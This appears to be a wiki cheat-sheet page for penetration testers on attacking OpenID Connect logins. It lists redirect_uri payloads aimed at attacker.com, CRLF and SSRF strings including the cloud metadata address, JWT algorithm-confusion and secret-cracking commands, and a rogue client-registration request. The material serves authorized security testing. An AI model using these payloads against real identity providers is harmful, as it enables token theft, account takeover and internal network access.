OIDC (Open ID Connect)

OpenID Connect is an authentication layer built on OAuth 2.0. Testing focuses on token manipulation, redirect vulnerabilities, and misconfigurations.

Common Implementations

- Keycloak (Red Hat)
- Okta
- Auth0
- Azure AD
- Amazon Cognito (AWS)
- Google Identity
- GitLab
- Bitbucket Server (Atlassian)
- Salesforce

Discovery & Enumeration

Well-Known Endpoints

# OIDC Configuration (always check this first)
curl https://target.com/.well-known/openid-configuration | jq

# Returns:
# - authorization_endpoint
# - token_endpoint
# - userinfo_endpoint
# - jwks_uri (JSON Web Key Set)
# - supported scopes, claims, grant types

# OAuth 2.0 Authorization Server Metadata
curl https://target.com/.well-known/oauth-authorization-server | jq

# WebFinger (for email-based discovery)
curl "https://target.com/.well-known/webfinger?resource=acct:[email protected]"

Key Endpoints to Test

/authorize
/token
/userinfo
/logout
/revoke
/introspect
/.well-known/openid-configuration
/.well-known/jwks.json

Token Attacks

ID Token Manipulation

# Decode ID token (JWT)
echo "eyJhbGciOiJSUzI1NiIs..." | cut -d'.' -f2 | base64 -d | jq

# Check for weak algorithms
# Look for: alg: "none", "HS256" (when RS256 expected)

# Algorithm confusion attack
# Change RS256 to HS256 and sign with public key as secret

Token Substitution

# Use token from one client for another
# 1. Get token from client A
# 2. Present to client B's resource server
# If aud (audience) claim not validated → vulnerable

Refresh Token Abuse

# Test if refresh token can be used without client_secret
curl -X POST https://target.com/token \
  -d "grant_type=refresh_token" \
  -d "refresh_token=REFRESH_TOKEN" \
  -d "client_id=CLIENT_ID"

# Test refresh token rotation
# Can old refresh tokens still be used after rotation?

Redirect URI Attacks

Open Redirect

# Test redirect_uri manipulation
/authorize?client_id=X&redirect_uri=https://attacker.com
/authorize?client_id=X&redirect_uri=https://target.com.attacker.com
/authorize?client_id=X&redirect_uri=https://target.com%40attacker.com
/authorize?client_id=X&redirect_uri=https://target.com/callback/../../../attacker

# Bypass techniques
redirect_uri=https://target.com/callback?next=https://attacker.com
redirect_uri=https://target.com/callback#@attacker.com
redirect_uri=https://target.com/callback%0d%0aLocation:%20https://attacker.com

Token Leakage via Redirect

# If token in URL fragment, test for:
# 1. Open redirect to leak fragment
# 2. Referrer header leakage
# 3. History API access

SSRF via OIDC

# Test URI parameters for SSRF
redirect_uri=http://169.254.169.254/
redirect_uri=http://localhost:8080/
jwks_uri=http://internal-server/jwks.json

# Metadata URL manipulation (for dynamic client registration)
curl -X POST https://target.com/register \
  -H "Content-Type: application/json" \
  -d '{"redirect_uris":["http://attacker.com"],"jwks_uri":"http://internal:8080"}'

State & Nonce Bypass

# Missing state parameter (CSRF)
# Remove state from authorization request
/authorize?client_id=X&redirect_uri=Y  # No state → CSRF possible

# State not bound to session
# Reuse state value from another session

# Missing nonce (replay attacks)
# Remove nonce from implicit flow requests

Scope Abuse

# Request elevated scopes
/authorize?client_id=X&scope=openid+profile+email+admin+write

# Test scope escalation after consent
# Get consent for 'read', then request token with 'read write'

Specific Provider Attacks

Keycloak

# Admin console
/auth/admin/
/auth/admin/master/console/

# Realm info
/auth/realms/{realm}/.well-known/openid-configuration

# CVE-2020-1714 - Adapter token spoofing
# CVE-2020-1728 - SAML authentication bypass

Azure AD

# Tenant enumeration
curl https://login.microsoftonline.com/{tenant}/.well-known/openid-configuration

# Guest user abuse
# B2B guest tokens may have unexpected permissions

AWS Cognito

# User pool info
curl https://cognito-idp.{region}.amazonaws.com/{userPoolId}/.well-known/openid-configuration

# Test for self-registration if enabled
# Check attribute-based access control bypass

Tools

# JWT testing
jwt_tool TOKEN -T  # Tamper mode
jwt_tool TOKEN -C -d wordlist.txt  # Crack secret

# Burp extensions
# - JSON Web Tokens
# - OAuth 2.0 Scanner
# - SAML Raider (for SAML/OIDC hybrid)

# OIDC testing
# https://github.com/AhmedMohamedDev/oidc-bash-client

OAuth - OIDC is built on OAuth 2.0
JWT - ID tokens are JWTs
SSRF - URI parameters can be SSRF vectors

PreviousJira NextELK

Last updated 8 days ago

Was this helpful?

hashtagCommon Implementations

hashtagDiscovery & Enumeration

hashtagWell-Known Endpoints

hashtagKey Endpoints to Test

hashtagToken Attacks

hashtagID Token Manipulation

hashtagToken Substitution

hashtagRefresh Token Abuse

hashtagRedirect URI Attacks

hashtagOpen Redirect

hashtagToken Leakage via Redirect

hashtagSSRF via OIDC

hashtagState & Nonce Bypass

hashtagScope Abuse

hashtagSpecific Provider Attacks

hashtagKeycloak

hashtagAzure AD

hashtagAWS Cognito

hashtagTools

hashtagRelated Topics

Common Implementations

Discovery & Enumeration

Well-Known Endpoints

Key Endpoints to Test

Token Attacks

ID Token Manipulation

Token Substitution

Refresh Token Abuse

Redirect URI Attacks

Open Redirect

Token Leakage via Redirect

SSRF via OIDC

State & Nonce Bypass

Scope Abuse

Specific Provider Attacks

Keycloak

Azure AD

AWS Cognito

Tools

Related Topics